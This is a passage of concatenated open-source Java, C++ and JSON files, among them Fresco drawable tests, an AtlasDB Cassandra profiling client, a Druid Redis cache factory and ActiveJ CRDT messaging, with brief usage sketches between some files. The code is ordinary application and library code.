9}, mRoundedBitmapDrawable.getRadii(), 0); } @Test public void testSetBorder() { int color = 0x12345678; float width = 5; mRoundedBitmapDrawable.setBorder(color, width); verify(mCallback).invalidateDrawable(mRoundedBitmapDrawable); assertEquals(color, mRoundedBitmapDrawable.getBorderColor()); assertEquals(width, mRoundedBitmapDrawable.getBorderWidth(), 0); } @Test public void testSetPadding() { float padding = 10; mRoundedBitmapDrawable.setPadding(padding); verify(mCallback).invalidateDrawable(mRoundedBitmapDrawable); assertEquals(padding, mRoundedBitmapDrawable.getPadding(), 0); } @Test public void testSetScaleDownInsideBorders() { mRoundedBitmapDrawable.setScaleDownInsideBorders(true); verify(mCallback).invalidateDrawable(mRoundedBitmapDrawable); assertTrue(mRoundedBitmapDrawable.getScaleDownInsideBorders()); } @Test public void testSetPaintFilterBitmap() { mRoundedBitmapDrawable.setPaintFilterBitmap(true); verify(mCallback).invalidateDrawable(mRoundedBitmapDrawable); assertTrue(mRoundedBitmapDrawable.getPaintFilterBitmap()); } @Test public void testShouldRoundDefault() { assertFalse(mRoundedBitmapDrawable.shouldRound()); assertFalse(mRoundedBitmapDrawableWithNullBitmap.shouldRound()); } @Test public void testShouldRoundRadius() { mRoundedBitmapDrawable.setRadius(5); assertTrue(mRoundedBitmapDrawable.shouldRound()); mRoundedBitmapDrawable.setRadius(0); 
assertFalse(mRoundedBitmapDrawable.shouldRound()); mRoundedBitmapDrawableWithNullBitmap.setRadius(5); assertFalse(mRoundedBitmapDrawableWithNullBitmap.shouldRound()); mRoundedBitmapDrawableWithNullBitmap.setRadius(0); assertFalse(mRoundedBitmapDrawableWithNullBitmap.shouldRound()); } @Test public void testShouldRoundRadii() { mRoundedBitmapDrawable.setRadii(new float[] {0, 0, 0, 0, 0, 0, 0, 1}); assertTrue(mRoundedBitmapDrawable.shouldRound()); mRoundedBitmapDrawable.setRadii(new float[] {0, 0, 0, 0, 0, 0, 0, 0}); assertFalse(mRoundedBitmapDrawable.shouldRound()); mRoundedBitmapDrawableWithNullBitmap.setRadii(new float[] {0, 0, 0, 0, 0, 0, 0, 1}); assertFalse(mRoundedBitmapDrawableWithNullBitmap.shouldRound()); mRoundedBitmapDrawableWithNullBitmap.setRadii(new float[] {0, 0, 0, 0, 0, 0, 0, 0}); assertFalse(mRoundedBitmapDrawableWithNullBitmap.shouldRound()); } @Test public void testShouldRoundCircle() { mRoundedBitmapDrawable.setCircle(true); assertTrue(mRoundedBitmapDrawable.shouldRound()); mRoundedBitmapDrawable.setCircle(false); assertFalse(mRoundedBitmapDrawable.shouldRound()); mRoundedBitmapDrawableWithNullBitmap.setCircle(true); assertFalse(mRoundedBitmapDrawableWithNullBitmap.shouldRound()); mRoundedBitmapDrawableWithNullBitmap.setCircle(false); assertFalse(mRoundedBitmapDrawableWithNullBitmap.shouldRound()); } @Test public void testShouldRoundBorder() { mRoundedBitmapDrawable.setBorder(0xFFFFFFFF, 1); assertTrue(mRoundedBitmapDrawable.shouldRound()); mRoundedBitmapDrawable.setBorder(0x00000000, 0); assertFalse(mRoundedBitmapDrawable.shouldRound()); mRoundedBitmapDrawableWithNullBitmap.setBorder(0xFFFFFFFF, 1); assertFalse(mRoundedBitmapDrawableWithNullBitmap.shouldRound()); mRoundedBitmapDrawableWithNullBitmap.setBorder(0x00000000, 0); assertFalse(mRoundedBitmapDrawableWithNullBitmap.shouldRound()); } @Test public void testPreservePaintOnDrawableCopy() { ColorFilter colorFilter = mock(ColorFilter.class); Paint originalPaint = mock(Paint.class); BitmapDrawable originalVersion = mock(BitmapDrawable.class); originalPaint.setColorFilter(colorFilter); when(originalVersion.getPaint()).thenReturn(originalPaint); RoundedBitmapDrawable roundedVersion = RoundedBitmapDrawable.fromBitmapDrawable(mResources, originalVersion); assertEquals( originalVersion.getPaint().getColorFilter(), roundedVersion.getPaint().getColorFilter()); } }
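// Illustrative usage sketch (not part of the Fresco test above). It exercises only the
// RoundedBitmapDrawable methods the test verifies -- fromBitmapDrawable, setCircle,
// setBorder and setPadding. The helper class name and the concrete border/padding values
// are assumptions made up for the example, not anything defined in the test file.
import android.content.res.Resources;
import android.graphics.drawable.BitmapDrawable;
import com.facebook.drawee.drawable.RoundedBitmapDrawable;

public class RoundedBitmapDrawableUsageSketch {
    public static RoundedBitmapDrawable roundedAvatar(Resources res, BitmapDrawable source) {
        // Wrap an existing BitmapDrawable; the source Paint is preserved
        // (see testPreservePaintOnDrawableCopy above).
        RoundedBitmapDrawable rounded = RoundedBitmapDrawable.fromBitmapDrawable(res, source);
        rounded.setCircle(true);           // draw as a circle instead of a rounded rect
        rounded.setBorder(0xFFFFFFFF, 4f); // white border, 4px wide (arbitrary example values)
        rounded.setPadding(2f);            // inset the bitmap inside the border
        return rounded;                    // shouldRound() is now true, so rounding applies on draw
    }
}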
2,228
709
package com.olacabs.jackhammer.models.mapper; import com.olacabs.jackhammer.models.Repo; import org.skife.jdbi.v2.StatementContext; import org.skife.jdbi.v2.tweak.ResultSetMapper; import java.sql.ResultSet; import java.sql.SQLException; public class RepoMapper implements ResultSetMapper<Repo> { public Repo map(int index, ResultSet resultSet, StatementContext statementContext) throws SQLException { Repo repo = new Repo(); repo.setId(resultSet.getLong("id")); repo.setName(resultSet.getString("name")); repo.setTarget(resultSet.getString("target")); repo.setGroupId(resultSet.getLong("groupId")); repo.setUserId(resultSet.getLong("userId")); repo.setOwnerTypeId(resultSet.getLong("ownerTypeId")); repo.setScanTypeId(resultSet.getLong("scanTypeId")); return repo; } }
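// Hypothetical usage sketch for the RepoMapper above with the JDBI v2 API
// (org.skife.jdbi.v2) it is written against. The DataSource, table name and column
// aliases are assumptions for illustration; the aliases only need to match the labels
// the mapper reads (id, name, target, groupId, userId, ownerTypeId, scanTypeId).
import java.util.List;
import javax.sql.DataSource;
import org.skife.jdbi.v2.DBI;
import org.skife.jdbi.v2.Handle;
import com.olacabs.jackhammer.models.Repo;
import com.olacabs.jackhammer.models.mapper.RepoMapper;

public class RepoMapperUsageSketch {
    public static List<Repo> loadRepos(DataSource dataSource) {
        DBI dbi = new DBI(dataSource);
        Handle handle = dbi.open();
        try {
            return handle
                    .createQuery("select id, name, target, groupId, userId, ownerTypeId, scanTypeId from repos")
                    .map(new RepoMapper())   // RepoMapper turns each row into a Repo
                    .list();
        } finally {
            handle.close();
        }
    }
}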
341
325
<gh_stars>100-1000 { "data": [ { "author": "<NAME>", "quote": "The main reason we waste time on small things is that we haven’t identified our big things." }, { "author": "<NAME>", "quote": "The only limits on your life are those that you set yourself." }, { "author": "<NAME>", "quote": "Every thought plants a seed to one of your actions. Every action, good or bad, will yield a consequence. The person who takes good steps every day, cannot help but reap a harvest of awesome results." }, { "author": "<NAME>", "quote": "Dream up a vision so brave it makes all around you roll with laughter." }, { "author": "<NAME>", "quote": "Be so good at what you do that you leave people breathless by your performance." }, { "author": "<NAME>", "quote": "The only failure is not trying." }, { "author": "<NAME>", "quote": "Today with love and respect, I challenge you to do one thing that you never thought you could do. This day’s your platform to transform." }, { "author": "<NAME>", "quote": "Once you surrender to your vision, success begins to chase you." }, { "author": "<NAME>", "quote": "To have what few have, do what few do." }, { "author": "<NAME>", "quote": "When you’re old, you’ll have wished you dreamed bigger, reached higher and achieved more. So why wait until you’re old?" }, { "author": "<NAME>", "quote": "As you live your hours, so you create your years. As you live your days, so you craft your life." }, { "author": "<NAME>", "quote": "Until your dream dominates your mindset, you’ll never wake up your greatness." }, { "author": "<NAME>", "quote": "Never lose the sparkle in your eye, the fire in your belly and the steel in your character." }, { "author": "<NAME>", "quote": "Less talk, more do. Less selfish, more selfless." }, { "author": "<NAME>", "quote": "To construct an awesome life, build your daily life around your deepest priorities." }, { "author": "<NAME>", "quote": "Elite performance is never luck. It’s hard work." }, { "author": "<NAME>", "quote": "Genius is more about what you have the discipline to say no to versus yes to." }, { "author": "<NAME>", "quote": "Great achievement often happens when our backs are up against the wall." }, { "author": "<NAME>", "quote": "Dedicate yourself to expressing your best." }, { "author": "<NAME>", "quote": "Love is the secret weapon of the iconic entrepreneur. Work with love, lead with love, serve with love. Do these and you become undefeatable." } ] }
1,065
515
package com.bj58.argo.interceptor;

import com.bj58.argo.ActionResult;
import com.bj58.argo.BeatContext;

/**
 * Interception handling that runs before a method executes. It can be implemented together with
 * @see PostInterceptor
 * or used on its own.
 *
 * @see PreInterceptorAnnotation
 */
public interface PreInterceptor {

    /**
     * Intercepts the current request.
     * @param beat the context of the current request
     * @return
     * null: proceed to the next interceptor or execute the Action
     * <BR/>
     * non-null: render the result directly, without proceeding to the next interceptor or executing the Action
     */
    public ActionResult preExecute(BeatContext beat);
}
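// A minimal, hypothetical implementation sketch of the PreInterceptor contract above.
// BeatContext's own API is not shown in this file, so the example only receives it;
// returning null lets the chain continue to the next interceptor or to the Action,
// as documented in the interface. The class name is made up for illustration.
import com.bj58.argo.ActionResult;
import com.bj58.argo.BeatContext;
import com.bj58.argo.interceptor.PreInterceptor;

public class LoggingPreInterceptor implements PreInterceptor {

    @Override
    public ActionResult preExecute(BeatContext beat) {
        // Place request-level checks or logging here. Returning a non-null
        // ActionResult would short-circuit the chain and render that result.
        System.out.println("preExecute invoked for current request");
        return null; // continue to the next interceptor / the Action
    }
}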
321
4,283
<reponame>larrydiamond/hazelcast<filename>hazelcast/src/test/java/com/hazelcast/test/starter/constructor/DataAwareEntryEventConstructor.java /* * Copyright (c) 2008-2021, Hazelcast, Inc. All Rights Reserved. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package com.hazelcast.test.starter.constructor; import com.hazelcast.test.starter.HazelcastStarterConstructor; import java.lang.reflect.Constructor; import static com.hazelcast.test.starter.HazelcastProxyFactory.proxyArgumentsIfNeeded; import static com.hazelcast.test.starter.ReflectionUtils.getFieldValueReflectively; @HazelcastStarterConstructor(classNames = {"com.hazelcast.map.impl.DataAwareEntryEvent"}) public class DataAwareEntryEventConstructor extends AbstractStarterObjectConstructor { public DataAwareEntryEventConstructor(Class<?> targetClass) { super(targetClass); } @Override Object createNew0(Object delegate) throws Exception { // locate required classes on target class loader ClassLoader starterClassLoader = targetClass.getClassLoader(); Class<?> dataClass = starterClassLoader.loadClass("com.hazelcast.internal.serialization.Data"); Class<?> memberClass = starterClassLoader.loadClass("com.hazelcast.cluster.Member"); Class<?> serServiceClass = starterClassLoader.loadClass("com.hazelcast.internal.serialization.SerializationService"); Constructor<?> constructor = targetClass.getConstructor(memberClass, Integer.TYPE, String.class, dataClass, dataClass, dataClass, dataClass, serServiceClass); Object serializationService = getFieldValueReflectively(delegate, "serializationService"); Object source = getFieldValueReflectively(delegate, "source"); Object member = getFieldValueReflectively(delegate, "member"); Object entryEventType = getFieldValueReflectively(delegate, "entryEventType"); Integer eventTypeId = (Integer) entryEventType.getClass().getMethod("getType").invoke(entryEventType); Object dataKey = getFieldValueReflectively(delegate, "dataKey"); Object dataNewValue = getFieldValueReflectively(delegate, "dataNewValue"); Object dataOldValue = getFieldValueReflectively(delegate, "dataOldValue"); Object dataMergingValue = getFieldValueReflectively(delegate, "dataMergingValue"); Object[] args = new Object[]{ member, eventTypeId, source, dataKey, dataNewValue, dataOldValue, dataMergingValue, serializationService, }; Object[] proxiedArgs = proxyArgumentsIfNeeded(args, starterClassLoader); return constructor.newInstance(proxiedArgs); } }
1,110
2,151
<filename>third_party/blink/renderer/core/html/custom/custom_element_definition_builder.h // Copyright 2016 The Chromium Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be // found in the LICENSE file. #ifndef THIRD_PARTY_BLINK_RENDERER_CORE_HTML_CUSTOM_CUSTOM_ELEMENT_DEFINITION_BUILDER_H_ #define THIRD_PARTY_BLINK_RENDERER_CORE_HTML_CUSTOM_CUSTOM_ELEMENT_DEFINITION_BUILDER_H_ #include "base/macros.h" #include "third_party/blink/renderer/core/core_export.h" #include "third_party/blink/renderer/core/css/css_style_sheet.h" #include "third_party/blink/renderer/core/html/custom/custom_element_definition.h" #include "third_party/blink/renderer/platform/wtf/allocator.h" namespace blink { class CustomElementDescriptor; class CustomElementRegistry; // Implement CustomElementDefinitionBuilder to provide // technology-specific steps for CustomElementRegistry.define. // https://html.spec.whatwg.org/multipage/scripting.html#dom-customelementsregistry-define class CORE_EXPORT CustomElementDefinitionBuilder { STACK_ALLOCATED(); public: // This API necessarily sounds JavaScript specific; this implements // some steps of the CustomElementRegistry.define process, which // are defined in terms of JavaScript. // Check the constructor is valid. Return false if processing // should not proceed. virtual bool CheckConstructorIntrinsics() = 0; // Check the constructor is not already registered in the calling // registry. Return false if processing should not proceed. virtual bool CheckConstructorNotRegistered() = 0; // Checking the prototype may destroy the window. Return false if // processing should not proceed. virtual bool CheckPrototype() = 0; // Cache properties for build to use. Return false if processing // should not proceed. virtual bool RememberOriginalProperties() = 0; // Produce the definition. This must produce a definition. virtual CustomElementDefinition* Build(const CustomElementDescriptor&, CustomElementDefinition::Id) = 0; protected: CustomElementDefinitionBuilder() = default; DISALLOW_COPY_AND_ASSIGN(CustomElementDefinitionBuilder); }; } // namespace blink #endif // THIRD_PARTY_BLINK_RENDERER_CORE_HTML_CUSTOM_CUSTOM_ELEMENT_DEFINITION_BUILDER_H_
724
862
/* * (c) Copyright 2018 Palantir Technologies Inc. All rights reserved. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package com.palantir.atlasdb.keyvalue.cassandra; import com.palantir.atlasdb.keyvalue.api.TableReference; import com.palantir.atlasdb.keyvalue.cassandra.thrift.ThriftObjectSizeUtils; import com.palantir.atlasdb.logging.KvsProfilingLogger; import com.palantir.atlasdb.logging.LoggingArgs; import com.palantir.logsafe.SafeArg; import java.nio.ByteBuffer; import java.util.Collection; import java.util.List; import java.util.Map; import org.apache.cassandra.thrift.CASResult; import org.apache.cassandra.thrift.Column; import org.apache.cassandra.thrift.ColumnOrSuperColumn; import org.apache.cassandra.thrift.Compression; import org.apache.cassandra.thrift.ConsistencyLevel; import org.apache.cassandra.thrift.CqlResult; import org.apache.cassandra.thrift.InvalidRequestException; import org.apache.cassandra.thrift.KeyPredicate; import org.apache.cassandra.thrift.KeyRange; import org.apache.cassandra.thrift.KeySlice; import org.apache.cassandra.thrift.Mutation; import org.apache.cassandra.thrift.NotFoundException; import org.apache.cassandra.thrift.SchemaDisagreementException; import org.apache.cassandra.thrift.SlicePredicate; import org.apache.cassandra.thrift.TimedOutException; import org.apache.cassandra.thrift.UnavailableException; import org.apache.thrift.TException; @SuppressWarnings({"all"}) // thrift variable names. 
public class ProfilingCassandraClient implements AutoDelegate_CassandraClient { private final CassandraClient client; public ProfilingCassandraClient(CassandraClient client) { this.client = client; } @Override public CassandraClient delegate() { return this.client; } @Override public Map<ByteBuffer, List<ColumnOrSuperColumn>> multiget_slice( String kvsMethodName, TableReference tableRef, List<ByteBuffer> keys, SlicePredicate predicate, ConsistencyLevel consistency_level) throws InvalidRequestException, UnavailableException, TimedOutException, TException { int numberOfKeys = keys.size(); int numberOfColumns = predicate.slice_range.count; long startTime = System.currentTimeMillis(); return KvsProfilingLogger.maybeLog( (KvsProfilingLogger.CallableCheckedException<Map<ByteBuffer, List<ColumnOrSuperColumn>>, TException>) () -> client.multiget_slice(kvsMethodName, tableRef, keys, predicate, consistency_level), (logger, timer) -> logger.log( "CassandraClient.multiget_slice({}, {}, {}, {}) at time {}, on kvs.{} took {} ms", LoggingArgs.tableRef(tableRef), LoggingArgs.keyCount(numberOfKeys), LoggingArgs.columnCount(numberOfColumns), SafeArg.of("consistency", consistency_level.toString()), LoggingArgs.startTimeMillis(startTime), SafeArg.of("kvsMethodName", kvsMethodName), LoggingArgs.durationMillis(timer)), (logger, rowsToColumns) -> logger.log( "and returned {} cells in {} rows with {} bytes", LoggingArgs.cellCount(countCells(rowsToColumns.values())), LoggingArgs.rowCount(rowsToColumns.size()), LoggingArgs.sizeInBytes(ThriftObjectSizeUtils.getApproximateSizeOfColsByKey(rowsToColumns)))); } @Override public Map<ByteBuffer, List<List<ColumnOrSuperColumn>>> multiget_multislice( String kvsMethodName, TableReference tableRef, List<KeyPredicate> keyPredicates, ConsistencyLevel consistency_level) throws InvalidRequestException, UnavailableException, TimedOutException, TException { int numberOfKeyPredicates = keyPredicates.size(); long startTime = System.currentTimeMillis(); return KvsProfilingLogger.maybeLog( () -> client.multiget_multislice(kvsMethodName, tableRef, keyPredicates, consistency_level), (logger, timer) -> logger.log( "CassandraClient.multiget_multislice({}, {}, {}) at time {}, on kvs.{}" + " took {} ms", LoggingArgs.tableRef(tableRef), SafeArg.of("numberOfKeyPredicates", numberOfKeyPredicates), SafeArg.of("consistency", consistency_level.toString()), LoggingArgs.startTimeMillis(startTime), SafeArg.of("kvsMethodName", kvsMethodName), LoggingArgs.durationMillis(timer)), (logger, rowsToColumnLists) -> logger.log( "and returned {} cells in {} rows with {} bytes", LoggingArgs.cellCount(countCellsAcrossKeys(rowsToColumnLists)), LoggingArgs.rowCount(rowsToColumnLists.size()), LoggingArgs.sizeInBytes( ThriftObjectSizeUtils.getApproximateSizeOfColListsByKey(rowsToColumnLists)))); } @Override public List<KeySlice> get_range_slices( String kvsMethodName, TableReference tableRef, SlicePredicate predicate, KeyRange range, ConsistencyLevel consistency_level) throws InvalidRequestException, UnavailableException, TimedOutException, TException { int numberOfKeys = predicate.slice_range.count; int numberOfColumns = range.count; long startTime = System.currentTimeMillis(); return KvsProfilingLogger.maybeLog( (KvsProfilingLogger.CallableCheckedException<List<KeySlice>, TException>) () -> client.get_range_slices(kvsMethodName, tableRef, predicate, range, consistency_level), (logger, timer) -> logger.log( "CassandraClient.get_range_slices({}, {}, {}, {}) at time {}, on kvs.{} took {} ms", 
LoggingArgs.tableRef(tableRef), LoggingArgs.keyCount(numberOfKeys), LoggingArgs.columnCount(numberOfColumns), SafeArg.of("consistency", consistency_level.toString()), LoggingArgs.startTimeMillis(startTime), SafeArg.of("kvsMethodName", kvsMethodName), LoggingArgs.durationMillis(timer)), (logger, rows) -> logger.log( "and returned {} rows with {} bytes", LoggingArgs.rowCount(rows.size()), LoggingArgs.sizeInBytes(ThriftObjectSizeUtils.getApproximateSizeOfKeySlices(rows)))); } @Override public void remove( String kvsMethodName, TableReference tableRef, byte[] row, long timestamp, ConsistencyLevel consistency_level) throws InvalidRequestException, UnavailableException, TimedOutException, TException { long startTime = System.currentTimeMillis(); KvsProfilingLogger.maybeLog( (KvsProfilingLogger.CallableCheckedException<Void, TException>) () -> { client.remove(kvsMethodName, tableRef, row, timestamp, consistency_level); return null; }, (logger, timer) -> logger.log( "CassandraClient.remove({}, {}, {}, {}) at time {}, on kvs.{} took {} ms", LoggingArgs.tableRef(tableRef), SafeArg.of("timestamp", timestamp), SafeArg.of("consistency", consistency_level.toString()), LoggingArgs.startTimeMillis(startTime), SafeArg.of("kvsMethodName", kvsMethodName), LoggingArgs.durationMillis(timer))); } @Override public void batch_mutate( String kvsMethodName, Map<ByteBuffer, Map<String, List<Mutation>>> mutation_map, ConsistencyLevel consistency_level) throws InvalidRequestException, UnavailableException, TimedOutException, TException { long startTime = System.currentTimeMillis(); KvsProfilingLogger.maybeLog( (KvsProfilingLogger.CallableCheckedException<Void, TException>) () -> { client.batch_mutate(kvsMethodName, mutation_map, consistency_level); return null; }, (logger, timer) -> { logger.log("CassandraClient.batch_mutate("); ThriftObjectSizeUtils.getSizeOfMutationPerTable(mutation_map) .forEach((tableName, size) -> { logger.log( "{} -> {}", LoggingArgs.safeInternalTableNameOrPlaceholder(tableName), LoggingArgs.sizeInBytes(size)); }); logger.log( ") with consistency {} at time {}, on kvs.{} took {} ms", SafeArg.of("consistency", consistency_level.toString()), LoggingArgs.startTimeMillis(startTime), SafeArg.of("kvsMethodName", kvsMethodName), LoggingArgs.durationMillis(timer)); }); } @Override public ColumnOrSuperColumn get( TableReference tableReference, ByteBuffer key, byte[] column, ConsistencyLevel consistency_level) throws InvalidRequestException, NotFoundException, UnavailableException, TimedOutException, TException { long startTime = System.currentTimeMillis(); return KvsProfilingLogger.maybeLog( (KvsProfilingLogger.CallableCheckedException<ColumnOrSuperColumn, TException>) () -> client.get(tableReference, key, column, consistency_level), (logger, timer) -> logger.log( "CassandraClient.get({}, {}) at time {} took {} ms", LoggingArgs.tableRef(tableReference), SafeArg.of("consistency", consistency_level.toString()), LoggingArgs.startTimeMillis(startTime), LoggingArgs.durationMillis(timer))); } @Override public CASResult cas( TableReference tableReference, ByteBuffer key, List<Column> expected, List<Column> updates, ConsistencyLevel serial_consistency_level, ConsistencyLevel commit_consistency_level) throws InvalidRequestException, UnavailableException, TimedOutException, TException { long startTime = System.currentTimeMillis(); return KvsProfilingLogger.maybeLog( (KvsProfilingLogger.CallableCheckedException<CASResult, TException>) () -> client.cas( tableReference, key, expected, updates, 
serial_consistency_level, commit_consistency_level), (logger, timer) -> logger.log( "CassandraClient.cas({}) at time {} took {} ms", LoggingArgs.tableRef(tableReference), LoggingArgs.startTimeMillis(startTime), LoggingArgs.durationMillis(timer))); } @Override public CqlResult execute_cql3_query(CqlQuery cqlQuery, Compression compression, ConsistencyLevel consistency) throws InvalidRequestException, UnavailableException, TimedOutException, SchemaDisagreementException, TException { long startTime = System.currentTimeMillis(); return KvsProfilingLogger.maybeLog( (KvsProfilingLogger.CallableCheckedException<CqlResult, TException>) () -> client.execute_cql3_query(cqlQuery, compression, consistency), cqlQuery::logSlowResult, (logger, cqlResult) -> { if (cqlResult.getRows() == null) { // different from an empty list logger.log( "and returned null rows. The query was started at time {}", LoggingArgs.startTimeMillis(startTime)); } else { logger.log( "and returned {} rows. The query was started at time {}", SafeArg.of("numRows", cqlResult.getRows().size()), LoggingArgs.startTimeMillis(startTime)); } }); } private static int countCellsAcrossKeys(Map<ByteBuffer, List<List<ColumnOrSuperColumn>>> rowsToColumnLists) { return rowsToColumnLists.values().stream() .mapToInt(ProfilingCassandraClient::countCells) .sum(); } private static int countCells(Collection<List<ColumnOrSuperColumn>> values) { return values.stream().mapToInt(List::size).sum(); } }
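// Hypothetical wiring sketch for the decorator above: ProfilingCassandraClient wraps any
// CassandraClient and logs timing/size information through KvsProfilingLogger before
// delegating. The rawClient parameter, table name, row key and timestamp below are
// assumptions for the example; TableReference.createFromFullyQualifiedName is the usual
// AtlasDB helper but is not shown in this file, so treat it as an assumption as well.
import java.nio.charset.StandardCharsets;
import org.apache.cassandra.thrift.ConsistencyLevel;
import com.palantir.atlasdb.keyvalue.api.TableReference;
import com.palantir.atlasdb.keyvalue.cassandra.CassandraClient;
import com.palantir.atlasdb.keyvalue.cassandra.ProfilingCassandraClient;

public class ProfilingCassandraClientUsageSketch {
    public static void deleteRow(CassandraClient rawClient, long deletionTimestamp) throws Exception {
        // Every call goes through the delegate; the decorator only adds logging.
        CassandraClient profiled = new ProfilingCassandraClient(rawClient);
        TableReference table = TableReference.createFromFullyQualifiedName("ns.example_table");
        byte[] row = "row-key".getBytes(StandardCharsets.UTF_8);

        profiled.remove("deleteRow", table, row, deletionTimestamp, ConsistencyLevel.QUORUM);
    }
}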
6,393
5,813
/* * Licensed to the Apache Software Foundation (ASF) under one * or more contributor license agreements. See the NOTICE file * distributed with this work for additional information * regarding copyright ownership. The ASF licenses this file * to you under the Apache License, Version 2.0 (the * "License"); you may not use this file except in compliance * with the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, * software distributed under the License is distributed on an * "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY * KIND, either express or implied. See the License for the * specific language governing permissions and limitations * under the License. */ package org.apache.druid.client.cache; import org.apache.commons.lang.StringUtils; import org.apache.druid.java.util.common.IAE; import redis.clients.jedis.HostAndPort; import redis.clients.jedis.JedisCluster; import redis.clients.jedis.JedisPool; import redis.clients.jedis.JedisPoolConfig; import java.util.Arrays; import java.util.Set; import java.util.stream.Collectors; public class RedisCacheFactory { public static Cache create(final RedisCacheConfig config) { if (config.getCluster() != null && StringUtils.isNotBlank(config.getCluster().getNodes())) { Set<HostAndPort> nodes = Arrays.stream(config.getCluster().getNodes().split(",")) .map(String::trim) .filter(StringUtils::isNotBlank) .map(hostAndPort -> { int index = hostAndPort.indexOf(':'); if (index <= 0 || index == hostAndPort.length()) { throw new IAE("Invalid redis cluster configuration: %s", hostAndPort); } int port; try { port = Integer.parseInt(hostAndPort.substring(index + 1)); } catch (NumberFormatException e) { throw new IAE("Invalid port in %s", hostAndPort); } if (port <= 0 || port > 65535) { throw new IAE("Invalid port in %s", hostAndPort); } return new HostAndPort(hostAndPort.substring(0, index), port); }).collect(Collectors.toSet()); JedisPoolConfig poolConfig = new JedisPoolConfig(); poolConfig.setMaxTotal(config.getMaxTotalConnections()); poolConfig.setMaxIdle(config.getMaxIdleConnections()); poolConfig.setMinIdle(config.getMinIdleConnections()); JedisCluster cluster; if (config.getPassword() != null) { cluster = new JedisCluster( nodes, config.getTimeout().getMillisecondsAsInt(), //connection timeout config.getTimeout().getMillisecondsAsInt(), //read timeout config.getCluster().getMaxRedirection(), config.getPassword().getPassword(), poolConfig ); } else { cluster = new JedisCluster( nodes, config.getTimeout().getMillisecondsAsInt(), //connection timeout and read timeout config.getCluster().getMaxRedirection(), poolConfig ); } return new RedisClusterCache(cluster, config); } else { if (StringUtils.isBlank(config.getHost())) { throw new IAE("Invalid redis configuration. no redis server or cluster configured."); } JedisPoolConfig poolConfig = new JedisPoolConfig(); poolConfig.setMaxTotal(config.getMaxTotalConnections()); poolConfig.setMaxIdle(config.getMaxIdleConnections()); poolConfig.setMinIdle(config.getMinIdleConnections()); return new RedisStandaloneCache( new JedisPool( poolConfig, config.getHost(), config.getPort(), config.getTimeout().getMillisecondsAsInt(), //connection timeout and read timeout config.getPassword() == null ? null : config.getPassword().getPassword(), config.getDatabase(), null ), config ); } } }
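// A minimal sketch of what the standalone branch of RedisCacheFactory.create() above sets
// up, using the raw Jedis API directly (the same JedisPoolConfig and JedisPool constructor
// the factory calls). Host, port, timeout, pool sizes and the cache key are made-up example
// values; the factory itself reads them from RedisCacheConfig instead.
import redis.clients.jedis.Jedis;
import redis.clients.jedis.JedisPool;
import redis.clients.jedis.JedisPoolConfig;

public class RedisStandaloneSketch {
    public static void main(String[] args) {
        JedisPoolConfig poolConfig = new JedisPoolConfig();
        poolConfig.setMaxTotal(8);   // ~ config.getMaxTotalConnections()
        poolConfig.setMaxIdle(8);    // ~ config.getMaxIdleConnections()
        poolConfig.setMinIdle(0);    // ~ config.getMinIdleConnections()

        // Mirrors: new JedisPool(poolConfig, host, port, timeout, password, database, clientName)
        JedisPool pool = new JedisPool(poolConfig, "localhost", 6379, 2000, null, 0, null);
        try (Jedis jedis = pool.getResource()) {
            jedis.set("druid:cache:example", "value");
            System.out.println(jedis.get("druid:cache:example"));
        } finally {
            pool.close();
        }
    }
}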
2,138
432
<gh_stars>100-1000 /* * Copyright (C) 2020 ActiveJ LLC. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package io.activej.crdt; import com.dslplatform.json.*; import java.util.Arrays; import java.util.Map; import static com.dslplatform.json.JsonWriter.*; import static java.util.function.Function.identity; import static java.util.stream.Collectors.toMap; public final class CrdtMessaging { public interface CrdtMessage {} public interface CrdtResponse {} @CompiledJson public enum CrdtMessages implements CrdtMessage { UPLOAD, REMOVE, PING } public static final class Download implements CrdtMessage { private final long token; public Download(long token) { this.token = token; } public long getToken() { return token; } @Override public String toString() { return "Download{token=" + token + '}'; } } @CompiledJson public enum CrdtResponses implements CrdtResponse { UPLOAD_FINISHED, REMOVE_FINISHED, PONG, DOWNLOAD_STARTED } public static final class ServerError implements CrdtResponse { private final String msg; public ServerError(String msg) { this.msg = msg; } public String getMsg() { return msg; } @Override public String toString() { return "ServerError{msg=" + msg + '}'; } } @SuppressWarnings("unused") static class JsonConverters { @JsonConverter(target = CrdtMessage.class) public static class CrdtMessageConverter { public static final JsonReader.ReadObject<CrdtMessage> JSON_READER = typedReader(CrdtMessages.class, Download.class); public static final JsonWriter.WriteObject<CrdtMessage> JSON_WRITER = typedWriter(); } @JsonConverter(target = CrdtResponse.class) public static class CrdtResponseConverter { public static final JsonReader.ReadObject<CrdtResponse> JSON_READER = typedReader(CrdtResponses.class, ServerError.class); public static final JsonWriter.WriteObject<CrdtResponse> JSON_WRITER = typedWriter(); } @SafeVarargs static <T> JsonReader.ReadObject<T> typedReader(Class<? extends T>... types) { Map<String, Class<? extends T>> typeMap = Arrays.stream(types) .collect(toMap(Class::getSimpleName, identity())); return reader -> { if (reader.wasNull()) return null; if (reader.last() != OBJECT_START) throw reader.newParseError("Expected '{'"); reader.getNextToken(); String type = reader.readString(); reader.semicolon(); T result; Class<? extends T> aClass = typeMap.get(type); if (aClass == null) { throw ParsingException.create("Unknown type: " + type, true); } //noinspection unchecked result = (T) reader.next(aClass); reader.endObject(); return result; }; } static <T> 